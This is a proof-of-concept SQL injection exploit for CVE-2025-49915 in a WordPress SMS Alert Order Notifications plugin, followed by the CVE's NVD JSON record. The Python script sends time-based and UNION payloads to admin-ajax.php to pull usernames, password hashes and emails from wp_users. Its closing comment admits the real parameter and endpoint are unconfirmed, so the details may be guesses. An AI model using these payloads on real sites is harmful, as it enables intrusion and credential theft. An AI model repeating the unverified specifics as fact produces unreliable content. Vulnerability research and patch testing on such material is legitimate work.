CVE-2025-49915

# CVE-2025-49915 - SQL Injection PoC for WordPress SMS Alert Order Notifications Plugin (<= 3.8.5) # Discovered by: [email protected] # This PoC demonstrates the SQL injection vulnerability via the plugin's vulnerable parameter import requests # Target configuration TARGET_URL = "http://target-wordpress-site.com" VULNERABLE_ENDPOINT = "/wp-admin/admin-ajax.php" # or other vulnerable endpoint # SQL Injection payload - time-based blind injection for confirmation # The payload targets the vulnerable parameter used by the SMS Alert plugin PAYLOAD_TIME_BASED = "1' AND SLEEP(5)-- -" # SQL Injection payload - UNION-based for data extraction PAYLOAD_UNION = ( "1' UNION SELECT user_login, user_pass, user_email " "FROM wp_users WHERE ID=1-- -" ) # Boolean-based blind injection payload PAYLOAD_BOOLEAN = "1' AND 1=1-- -" # True condition PAYLOAD_BOOLEAN_FALSE = "1' AND 1=2-- -" # False condition def exploit_sql_injection(target_url, action, payload): """ Send crafted request exploiting the SQL injection in SMS Alert plugin """ data = { "action": action, "order_id": payload, # Vulnerable parameter } try: response = requests.post( f"{target_url}{VULNERABLE_ENDPOINT}", data=data, timeout=15 ) return response except requests.exceptions.RequestException as e: print(f"Request failed: {e}") return None # Step 1: Confirm vulnerability with time-based injection print("[*] Testing for SQL injection vulnerability...") response = exploit_sql_injection(TARGET_URL, "smsalert_action", PAYLOAD_TIME_BASED) if response and response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Server delayed response indicating SQL injection.") # Step 2: Extract sensitive data using UNION-based injection print("[*] Attempting data extraction...") response = exploit_sql_injection(TARGET_URL, "smsalert_action", PAYLOAD_UNION) if response: print(f"[+] Response: {response.text[:500]}") print("[!] Check response for extracted database contents.") # Note: Actual exploitation requires identifying the specific vulnerable parameter # and endpoint within the SMS Alert Order Notifications plugin.

{"cve": {"id": "CVE-2025-49915", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:37.440", "lastModified": "2026-04-27T20:16:16.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cozy Vision SMS Alert Order Notifications sms-alert allows SQL Injection.This issue affects SMS Alert Order Notifications: from n/a through <= 3.8.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sms-alert/vulnerability/wordpress-sms-alert-order-notifications-plugin-3-8-5-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}